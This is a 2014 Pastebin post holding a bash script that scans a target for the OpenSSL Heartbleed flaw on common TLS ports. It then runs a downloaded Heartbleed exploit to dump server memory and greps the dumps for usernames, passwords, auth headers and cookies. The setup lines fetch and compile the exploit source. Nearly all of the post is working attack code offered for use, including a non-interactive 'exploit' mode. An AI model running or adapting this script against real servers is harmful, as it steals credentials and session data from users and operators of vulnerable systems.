daily pastebin goal
64%
SHARE
TWEET

SCAN + EXPLOIT Heartbleed OpenSSL 1.0.1

Googleinurl May 6th, 2014 1,690 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Heartbleed
  2.  
  3. #Affected OpenSSL versions
  4.  
  5. #The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
  6. #Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable.
  7. #Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
  8.  
  9. # Scan and exploit
  10.  
  11.  
  12. # ./hbse 127.0.0.1 # Interactive mode.
  13. # ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
  14. # ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.
  15.  
  16.  
  17. # Requirements
  18.  
  19. # apt-get install nmap
  20. # wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
  21. # mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
  22. # wget http://nmap.org/svn/nselib/tls.lua
  23. # mv tls.lua /usr/share/nmap/nselib/.
  24. # wget -O heartbleed.c http://www.exploit-db.com/download/32791
  25. # gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
  26.  
  27. # SCRIPT
  28.  
  29. # cat hbse
  30. #!/bin/bash
  31.  
  32. ### TCP ####
  33.  
  34. # 443  (HTTPS - HTTP over SSL)
  35. # 465  (SMTPS - SMTP over SSL)
  36. # 563  (NNTPS - NNTP over TLS/SSL)
  37. # 636  (LDAPS - LDAP over TLS/SSL)
  38. # 989  (FTPS Data - FTP Data over TLS/SSL)
  39. # 990  (FTPS Control - FTP Control over TLS/SSL)
  40. # 992  (Telnet over TLS/SSL)
  41. # 993  (IMAPS - IMAP over SSL)
  42. # 995  (POP3S - POP3 over SSL)
  43. # 1194 (OpenVPN)
  44. # 2484 (Oracle Database listening for SSL client)
  45. # 5061 (SIP over TLS)
  46. # 8443 (Apache Tomcat SSL)
  47.  
  48. ### UDP ###
  49.  
  50. # 563  (NNTPS - NNTP over TLS/SSL)
  51. # 636  (LDAPS - LDAP over TLS/SSL)
  52. # 4433 (OpenSSL)
  53.  
  54. if [ $# -eq 1 ]; then
  55.     ip="$1"
  56. elif [ $# -eq 2 ]; then
  57.     se="$1"
  58.     ip="$2"
  59. else
  60.     exit
  61. fi
  62. nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"
  63.  
  64. function print() {
  65.     text="$1"
  66.     color="$2"
  67.     if [ "$color" == "gray" ]; then
  68.         header="\e[38;5;250m"
  69.     elif [ "$color" == "red" ]; then
  70.         header="\e[91m"
  71.     elif [ "$color" == "green" ]; then
  72.         header="\e[92m"
  73.     elif [ "$color" == "yellow" ]; then
  74.         header="\e[93m"
  75.     fi
  76.     tail="\e[0m"
  77.     echo -en $header$text$tail
  78. }
  79.  
  80. print "Checking if $ip is vulnerable on port 443... " "gray"
  81. vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"
  82.  
  83. if [ "$vulnerable" != "" ]; then
  84.     print "Yes\n" "green"
  85.     print "Checking if it is vulnerable on other ports... " "gray"
  86.     vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
  87.     n="`echo "$ports" | wc -l`"
  88.     if [ "$n" == 1 ]; then
  89.         print "No\n" "red"
  90.         w1="port"
  91.         w2="it"
  92.         w3="file"
  93.     else
  94.         print "Yes\n" "green"
  95.         w1="ports"
  96.         w2="them"
  97.         w3="files"
  98.     fi
  99.     print "Vulnerable $w1:\n" "gray"
  100.     print "$vports\n" "green"
  101.     if [ "$se" == "--scan" ]; then exit
  102.     elif [ "$se" == "--exploit" ]; then
  103.         answer="Y"
  104.     else
  105.         print "Do you want to exploit $w2? [Yn] " "gray"
  106.         read answer
  107.     fi
  108.     if [ "$answer" = "Y" ]; then
  109.         print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
  110.         exec 3<<< "$vports"
  111.         while read port <&3; do
  112.             print "+ Port [$port]\n" "gray"
  113.             ofile="$ip.$port"
  114.             if [ -f $ofile ]; then rm -f $ofile; fi
  115.             if [ "$port" == "465" ]; then
  116.                 precmd='-c 0'
  117.             elif [ "$port" == "993" ]; then
  118.                 precmd='-c 2'
  119.             elif [ "$port" == "995" ]; then
  120.                 precmd='-c 1'
  121.             else
  122.                 precmd=''
  123.             fi
  124.             ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
  125.             if [ -f $ofile ]; then
  126.                 r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
  127.                 print "$r\n" "green"
  128.                 if [ "$se" != "--exploit" ]; then
  129.                     print "Do you want to less the hexdump file? [Yn] " "gray"
  130.                     read answer
  131.                     if [ "$answer" = "Y" ]; then
  132.                         hexdump -C $ofile | less
  133.                     fi
  134.                 fi
  135.             else
  136.                 print "Error: heartbleed did not work on port $port...\n" "yellow"
  137.             fi
  138.         done
  139.         if [ "$se" != "--exploit" ]; then
  140.             print "Do you want to delete the hexdump $w3? [Yn] " "gray"
  141.             read answer
  142.             if [ "$answer" = "Y" ]; then
  143.                 rm -f $ip.*
  144.             fi
  145.         fi
  146.     fi
  147. else
  148.     print "No\n" "red"
  149. fi
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top